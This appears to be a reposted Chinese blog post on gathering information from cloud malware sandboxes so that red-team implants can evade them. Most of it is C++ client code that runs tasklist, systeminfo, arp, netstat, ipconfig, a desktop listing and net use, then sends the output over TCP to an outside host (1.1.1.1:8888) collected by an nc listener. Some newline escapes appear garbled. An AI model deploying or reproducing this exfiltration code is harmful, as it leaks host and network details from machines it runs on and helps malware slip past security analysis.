已知条件:
云沙箱和情报信息服务之间的关系,这个很重要,毕竟再过几个月HW又会到来,那各位的马儿,是否可以欢快的跑在各大跑马场就是个玄学问题了。
环境准备:
一个服务端,我们使用NC进行替代;
一个客户端,将信息传递出来;
服务端:
NC -l port
客户端:
实现方式以及代码因人而异,大家可以使用自己喜欢的实现语言,充分借鉴互联网大佬的轮子,示例如下:
// 执行命令
std::string execCmd(const char* cmd)
{
char buffer[MAX_PATH] = { 0 };
std::string result;
FILE* pipe = _popen(cmd, "r");
if (!pipe) throw std::runtime_error("_popen() failed!");
while (!feof(pipe))
{
if (fgets(buffer, MAX_PATH, pipe) != NULL)
result += buffer;
}
_pclose(pipe);
return result;
}
// SOCKET连接
int main(){
WORD sockVersion = MAKEWORD(2, 2);
WSAData saData;
if (WSAStartup(sockVersion, &saData)) {
return 0;
}
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sclient == INVALID_SOCKET) {
printf("INVALID SOCKET");
return 0;
}
sockaddr_in serAddr = { 0 };
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(8888);
inet_pton(AF_INET, "1.1.1.1", &serAddr.sin_addr);
if (connect(sclient, (sockaddr *) &serAddr, sizeof serAddr) == SOCKET_ERROR) {
printf("CONNECT ERROR!");
closesocket(sclient);
return 0;
}
// tasklist /svc
string tasklist_result = execCmd("tasklist /svc");
send(sclient, tasklist_result.c_str(), strlen(tasklist_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// systeminfo
string systeminfo_result = execCmd("systeminfo");
send(sclient, systeminfo_result.c_str(), strlen(systeminfo_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// arp -a
string arp_result = execCmd("arp -a");
send(sclient, arp_result.c_str(), strlen(arp_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// netstat -ano
string netstat_result = execCmd("netstat -ano ");
send(sclient, netstat_result.c_str(), strlen(netstat_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// ipconfig -a
string ipconfig_result = execCmd("ipconfig /all");
send(sclient, ipconfig_result.c_str(), strlen(ipconfig_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// 桌面文件
string desktop_result = execCmd("dir %USERPROFILE%\DESKTOP");
send(sclient, desktop_result.c_str(), strlen(desktop_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// net use
string NETUSE_result = execCmd("net use");
send(sclient, NETUSE_result.c_str(), strlen(NETUSE_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
closesocket(sclient);
WSACleanup();
return 0;
}
验证:
参考资料:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://bbs.kafan.cn/thread-2082898-1-1.html
本文来源于互联网:对云沙箱分析的一种反制技术-沙箱信息获取